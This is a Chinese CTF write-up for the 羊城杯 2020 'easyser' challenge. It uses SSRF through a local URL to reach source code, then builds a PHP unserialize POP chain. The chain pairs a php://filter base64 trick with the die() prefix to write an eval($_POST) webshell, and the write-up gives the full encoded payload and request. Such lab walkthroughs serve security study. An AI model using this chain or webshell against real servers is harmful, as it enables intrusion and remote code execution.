[羊城杯 2020]easyser
- 一、解题过程
- (一)、一阶段
- (二)、二阶段
- 二、思考总结
一、解题过程
(一)、一阶段
- 可以直接使用ctf-wscan扫描一下有什么文件,或者直接试试robots.txt能不能行
直接打开star1.php
看到这页面,和页面提示,基本和SSRF有关系了 - F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! !
意思就是http协议就能进ser.php,回顾一下http协议咋用的?
http://ser.php ×
http://127.0.0.1/ser.php √<?php error_reporting(0); if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) { highlight_file(__FILE__); } $flag='{Trump_:"fake_news!"}'; class GWHT{ public $hero; public function __construct(){ $this->hero = new Yasuo; } public function __toString(){ if (isset($this->hero)){ return $this->hero->hasaki(); }else{ return "You don't look very happy"; } } } class Yongen{ //flag.php public $file; public $text; public function __construct($file='',$text='') { $this -> file = $file; $this -> text = $text; } public function hasaki(){ $d = '<?php die("nononon");?>'; $a= $d. $this->text; @file_put_contents($this-> file,$a); } } class Yasuo{ public function hasaki(){ return "I'm the best happy windy man"; } } ?> your hat is too black! - 分析
起点:GWHT(__construct)终点:Yongen(hasaki)
链条:GWHT(construct -> toString)-> Yongen(construct -> hasaki)
属性:GWHT(hero=$y)-> Yongen(file=伪协议代码;text=一句话;) - 根据ser.php构造pop链
<?php class GWHT{ public $hero; } class Yongen{ public $file; public $text; } $g = new GWHT(); $y = new Yongen(); $g->hero = $y; $y->file = "php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php"; $y->text = "PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4="; echo urlencode(serialize($g)); ?> 绕死亡die原理:写入shell.php的内容会进行base64解码,而'<?php die("nononon");?>'; 经过解码会变成乱码而失效,这样就绕过了 得到:O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A40%3A%22PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4%3D%22%3B%7D%7D
(二)、二阶段
在得到序列化数据之后,有个问题,怎么传参?参数名是啥?
这里需要用一个工具:arjun
arjun -u http://node4.anna.nssctf.cn:28330/star1.php?path=http%3A%2F%2F127.0.0.1%2Fser.php -d 1
得到参数是c
payload=?path=http%3A%2F%2F127.0.0.1%2Fstar1.php&c=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A40%3A%22PD9waHAgQGV2YWwoJF9QT1NUWyJwd2QiXSk7Pz4%3D%22%3B%7D%7D
蚁剑连接shell.php即可查看flag
二、思考总结
1、我使用arjun工具扫不出来这题的参数,不太清楚原因
2、这题的unserialize函数在star1.php,ser.php没显示,但是还是可以正常反序列化
